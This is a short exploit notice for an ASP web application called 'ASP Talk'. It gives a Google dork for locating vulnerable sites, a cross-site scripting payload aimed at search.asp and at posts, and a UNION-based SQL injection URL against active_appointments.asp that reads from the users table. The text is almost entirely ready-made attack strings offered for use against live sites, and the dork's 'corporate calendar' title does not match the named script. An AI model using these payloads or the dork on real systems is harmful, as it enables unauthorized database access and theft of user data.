[+] Script : ASP Talk
[+] Exploit Type : Multiple Exploits (SQL/CSS)
[+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id=
[+] Contact : blackbeard-sql A.T hotmail.fr
--//--> Exploit :
1)Cross site scripting :
http://[website]/[script]/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All
post = <script>alert('Bl@clbe@rD Is Here');</script>
2) Remote sql injection Exploit :
http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users
[peace xD]